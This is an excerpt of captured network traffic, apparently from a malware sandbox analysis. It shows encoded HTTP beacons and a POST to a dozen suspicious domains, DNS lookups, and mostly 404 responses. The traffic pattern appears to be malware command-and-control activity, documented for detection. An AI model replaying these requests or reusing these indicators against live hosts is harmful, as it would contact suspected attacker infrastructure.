            Source: global trafficHTTP traffic detected: GET /7kkb/?6RGD=r8eHwnMpb2dxK&Ah=Vuf7L1aATO5bukV8eQdUIEmIaPgQ1yOpdgGCLe1WZLTuWrNT4xutTpWyFskV9eTAAXQRhMy7Zgc6S7zaREH9Qt7yJDZ+mejpqMKnoLgUtbmjvcVg7/Biou/HjIkaZAov/Q== HTTP/1.1Host: www.martaschrimpf.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /3nd4/?Ah=wX8jjEADFIUNbB1fuwn27lCA5Ee2RiJ4qVOVM3qHbtn5VxkeI5MaAkn7o3WZs+Yr7x4eULr6m9MYlnr0WXfs3GrmtSbeGOpl3yeERPUVozEPpEyzLyJ+XoeluijW2G1r0A==&6RGD=r8eHwnMpb2dxK HTTP/1.1Host: www.tomtox.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /e55r/?6RGD=r8eHwnMpb2dxK&Ah=Zzgqh8Lsa2kOmONOeD/+wB3QPxQKiLO67pxSC7hPMpOG1Z1VfhXWq1/e6lRyRcxlhH3VBh1kivLC4EoU4HrmQnEQVHiNTiKoH2rx3XIqvsrry8gzD7/bBD8mRjNwheBxYg== HTTP/1.1Host: www.tracy.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /zmf1/?Ah=wQgzSdKeo0kEfEOz4RbofRMggT2xbAKfRVneK/8vOxPjchK4g13SHjFeWQ1KQd6iPh0o+E7CiOJrL4NuVjgo/c0di4XWtbQHuM4tDDSwmQdaf4WdVMWT5U3p3+pOk6ad0A==&6RGD=r8eHwnMpb2dxK HTTP/1.1Host: www.sppsuperplast.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /bie8/?Ah=MA/0DFY0DiyH2olo7m8hVrrP5UH/jhcgcmWioqAK+793cplJM4qg3DyTQ66FMurZmF9Te+JpNl4zVYtM50IcS4zemXuWAdJhdKdflRI3BWRfqiAf3s5RU6wyOr9MBb+x+g==&6RGD=r8eHwnMpb2dxK HTTP/1.1Host: www.nojamaica.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficHTTP traffic detected: GET /xf5b/?Ah=bUc8Ed0aZESOAy+KJaIejJlAhDqRJymtCfRMAnUAQR11I0sOX+AQaEFDTlraWU4+rT7gLfO5Dt9FKcAEmJO6tRh3wQ1OL/3vPyqK0hsKckbG/SsYmEPJIzY3hoX+M0Wr3w==&6RGD=r8eHwnMpb2dxK HTTP/1.1Host: www.alphaaistore.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 Mobile
            Source: global trafficDNS traffic detected: DNS query: www.030003302.xyz
            Source: global trafficDNS traffic detected: DNS query: www.popin.space
            Source: global trafficDNS traffic detected: DNS query: www.48vlu.shop
            Source: global trafficDNS traffic detected: DNS query: www.searchgpt.homes
            Source: global trafficDNS traffic detected: DNS query: www.2q63f.top
            Source: global trafficDNS traffic detected: DNS query: www.b5x7vk.agency
            Source: global trafficDNS traffic detected: DNS query: www.martaschrimpf.info
            Source: global trafficDNS traffic detected: DNS query: www.tomtox.top
            Source: global trafficDNS traffic detected: DNS query: www.tracy.club
            Source: global trafficDNS traffic detected: DNS query: www.sppsuperplast.online
            Source: global trafficDNS traffic detected: DNS query: www.nojamaica.net
            Source: global trafficDNS traffic detected: DNS query: www.alphaaistore.com
            Source: unknownHTTP traffic detected: POST /974s/ HTTP/1.1Host: www.searchgpt.homesAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brContent-Length: 203Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Connection: closeOrigin: http://www.searchgpt.homesReferer: http://www.searchgpt.homes/974s/User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; pt-BR; LG-E400f Build/GRK39F) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 UCBrowser/10.3.0.622 MobileData Raw: 41 68 3d 39 71 70 4b 54 52 46 74 4a 53 78 2b 30 63 69 6c 76 63 47 54 77 43 48 42 5a 79 66 4e 74 46 42 6b 6c 38 32 66 44 78 66 45 77 6e 6f 75 75 33 45 53 55 44 44 50 73 4f 6f 32 33 79 51 7a 31 32 57 39 72 41 2f 6d 45 75 76 49 62 65 6d 7a 34 52 64 4d 42 54 54 78 51 77 6d 37 4b 6e 30 46 69 5a 33 4e 47 58 4e 70 6c 35 6a 77 6a 34 62 62 7a 38 2f 44 45 78 71 5a 73 78 4d 35 4f 4b 4c 45 74 53 41 70 6e 69 33 33 45 6d 71 73 36 4d 38 66 65 66 31 55 4a 54 39 69 4a 56 65 6e 76 79 2b 54 45 6f 58 2b 6b 54 79 70 32 73 42 46 41 58 4a 32 4e 46 31 39 75 75 46 65 51 63 4c 2b 39 6d 50 78 32 2f 75 71 49 75 73 51 31 6c 77 3d Data Ascii: Ah=9qpKTRFtJSx+0cilvcGTwCHBZyfNtFBkl82fDxfEwnouu3ESUDDPsOo23yQz12W9rA/mEuvIbemz4RdMBTTxQwm7Kn0FiZ3NGXNpl5jwj4bbz8/DExqZsxM5OKLEtSApni33Emqs6M8fef1UJT9iJVenvy+TEoX+kTyp2sBFAXJ2NF19uuFeQcL+9mPx2/uqIusQ1lw=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 27 Sep 2024 15:29:46 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 15:30:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 15:30:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 15:30:37 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Sep 2024 15:30:39 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 15:30:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6aXeM3MhiMSMnaUiXyy%2FWaGoGavnfbXxkPxmI9wQw7H3zgj9mXmFFwQVlcdcc%2B728iYBeObpIDAnQoB2wb6YqEK6odhz%2FM4Oxdc5%2FR6kXPC5Pyvw8Vmqmw9jpc2RoBB5lemxPg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c9c896c7a1f4213-EWRContent-Encoding: gzipData Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 15:30:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I6caT3V9PUjdDFr7KSnkRmMYcOmPRirgmFmZ7F5YR7XtMVz%2FdnZVdVzDY1KWArZkw4%2BAhZTOroSyr8AQVrC6QxM25lpRCBsxV1G5MHvGmlJ38dTxkmjl1P0npITEpWF9m2FLOQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c9c897c8905430d-EWRContent-Encoding: gzipData Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 15:30:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dWHQVjxtLPBV%2BAEKFjoR8OkKv1BdvDYU6xxAY8%2BsMqMTf649w1yvfFdYe5SOsdmh1Ak19jJDL9RrPEzFsh4Df6%2FAWLA86jqJNoqSo61JkeNqy8KWuwb7M8hA%2BPBWGiMBrNvasg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c9c898c2947c436-EWRContent-Encoding: gzipData Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 15:30:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fGHQt%2Fn4mIQJsdIoR5kriFbshWEY0VR0Qg7LGnSkF0v4q2o0Kd7va7Ne6pdqHRvUYuc9x1Yu2jn2QMnI3I6pVl1XazmJ1Vw8zjCE%2BR5zqfSlSdzlnnm9W7q0YF9rCaq%2FEMt30g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8c9c899c294942ea-EWRData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 15:31:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 15:31:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 15:31:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
